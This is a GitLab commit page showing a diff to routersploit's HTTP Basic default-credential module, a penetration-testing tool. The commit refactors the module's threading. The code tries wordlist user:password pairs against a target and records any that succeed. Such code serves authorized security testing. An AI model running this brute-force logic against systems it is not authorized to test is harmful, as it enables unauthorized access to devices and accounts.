Skip to content
Projects
Groups
Snippets
Help
This project
Loading...
Sign in / Register
Toggle navigation
R
routersploit
Overview
Overview
Details
Activity
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Board
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
czos-dpend
routersploit
Commits
a8c5cb03
Commit
a8c5cb03
authored
Aug 07, 2016
by
fwkz
Browse files
Options
Browse Files
Download
Email Patches
Plain Diff
Refactoring creds/http_basic_default with ThreadPoolExecutor.
parent
02355bce
Hide whitespace changes
Inline
Side-by-side
Showing
1 changed file
with
22 additions
and
28 deletions
+22
-28
http_basic_default.py
routersploit/modules/creds/http_basic_default.py
+22
-28
No files found.
routersploit/modules/creds/http_basic_default.py
View file @
a8c5cb03
...
@@ -5,15 +5,17 @@ from routersploit import (
...
@@ -5,15 +5,17 @@ from routersploit import (
wordlists
,
wordlists
,
print_status
,
print_status
,
print_error
,
print_error
,
LockedIterator
,
print_success
,
print_success
,
print_table
,
print_table
,
sanitize_url
,
boolify
,
boolify
,
http_request
,
http_request
,
multi
,
multi
,
validators
,
)
)
from
routersploit.exceptions
import
StopThreadPoolExecutor
from
routersploit.threads
import
ThreadPoolExecutor
class
Exploit
(
exploits
.
Exploit
):
class
Exploit
(
exploits
.
Exploit
):
"""
"""
...
@@ -35,7 +37,7 @@ class Exploit(exploits.Exploit):
...
@@ -35,7 +37,7 @@ class Exploit(exploits.Exploit):
],
],
}
}
target
=
exploits
.
Option
(
''
,
'Target IP address or file with target:port (file://)'
)
target
=
exploits
.
Option
(
''
,
'Target IP address or file with target:port (file://)'
,
validators
=
validators
.
url
)
port
=
exploits
.
Option
(
80
,
'Target port'
)
port
=
exploits
.
Option
(
80
,
'Target port'
)
threads
=
exploits
.
Option
(
8
,
'Number of threads'
)
threads
=
exploits
.
Option
(
8
,
'Number of threads'
)
defaults
=
exploits
.
Option
(
wordlists
.
defaults
,
'User:Pass or file with default credentials (file://)'
)
defaults
=
exploits
.
Option
(
wordlists
.
defaults
,
'User:Pass or file with default credentials (file://)'
)
...
@@ -51,7 +53,7 @@ class Exploit(exploits.Exploit):
...
@@ -51,7 +53,7 @@ class Exploit(exploits.Exploit):
@multi
@multi
def
attack
(
self
):
def
attack
(
self
):
url
=
sanitize_url
(
"{}:{}{}"
.
format
(
self
.
target
,
self
.
port
,
self
.
path
)
)
url
=
"{}:{}{}"
.
format
(
self
.
target
,
self
.
port
,
self
.
path
)
response
=
http_request
(
"GET"
,
url
)
response
=
http_request
(
"GET"
,
url
)
if
response
is
None
:
if
response
is
None
:
...
@@ -66,8 +68,10 @@ class Exploit(exploits.Exploit):
...
@@ -66,8 +68,10 @@ class Exploit(exploits.Exploit):
else
:
else
:
defaults
=
[
self
.
defaults
]
defaults
=
[
self
.
defaults
]
collection
=
LockedIterator
(
defaults
)
with
ThreadPoolExecutor
(
self
.
threads
)
as
executor
:
self
.
run_threads
(
self
.
threads
,
self
.
target_function
,
collection
)
for
record
in
defaults
:
username
,
password
=
record
.
split
(
':'
)
executor
.
submit
(
self
.
target_function
,
username
,
password
)
if
self
.
credentials
:
if
self
.
credentials
:
print_success
(
"Credentials found!"
)
print_success
(
"Credentials found!"
)
...
@@ -78,30 +82,20 @@ class Exploit(exploits.Exploit):
...
@@ -78,30 +82,20 @@ class Exploit(exploits.Exploit):
defaults
.
close
()
defaults
.
close
()
def
target_function
(
self
,
running
,
data
):
def
target_function
(
self
,
user
,
password
):
module_verbosity
=
boolify
(
self
.
verbosity
)
module_verbosity
=
boolify
(
self
.
verbosity
)
name
=
threading
.
current_thread
()
.
name
name
=
threading
.
current_thread
()
.
name
url
=
sanitize_url
(
"{}:{}{}"
.
format
(
self
.
target
,
self
.
port
,
self
.
path
))
url
=
"{}:{}{}"
.
format
(
self
.
target
,
self
.
port
,
self
.
path
)
print_status
(
name
,
'process is starting...'
,
verbose
=
module_verbosity
)
while
running
.
is_set
():
try
:
line
=
data
.
next
()
.
split
(
":"
)
user
=
line
[
0
]
.
encode
(
'utf-8'
)
.
strip
()
password
=
line
[
1
]
.
encode
(
'utf-8'
)
.
strip
()
response
=
http_request
(
method
=
"GET"
,
url
=
url
,
auth
=
(
user
,
password
))
user
=
user
.
encode
(
'utf-8'
)
.
strip
()
password
=
password
.
encode
(
'utf-8'
)
.
strip
()
if
response
.
status_code
!=
401
:
response
=
http_request
(
method
=
"GET"
,
url
=
url
,
auth
=
(
user
,
password
))
if
boolify
(
self
.
stop_on_success
):
running
.
clear
()
print_success
(
"Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'"
.
format
(
self
.
target
,
self
.
port
,
name
,
user
,
password
),
verbose
=
module_verbosity
)
if
response
.
status_code
!=
401
:
self
.
credentials
.
append
((
self
.
target
,
self
.
port
,
user
,
password
))
print_success
(
"Target: {}:{} {}: Authentication Succeed - Username: '{}' Password: '{}'"
.
format
(
self
.
target
,
self
.
port
,
name
,
user
,
password
),
verbose
=
module_verbosity
)
else
:
self
.
credentials
.
append
((
self
.
target
,
self
.
port
,
user
,
password
))
print_error
(
"Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'"
.
format
(
self
.
target
,
self
.
port
,
name
,
user
,
password
),
verbose
=
module_verbosity
)
if
boolify
(
self
.
stop_on_success
):
except
StopIteration
:
raise
StopThreadPoolExecutor
break
else
:
print_error
(
"Target: {}:{} {}: Authentication Failed - Username: '{}' Password: '{}'"
.
format
(
self
.
target
,
self
.
port
,
name
,
user
,
password
),
verbose
=
module_verbosity
)
print_status
(
name
,
'process is terminated.'
,
verbose
=
module_verbosity
)
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment
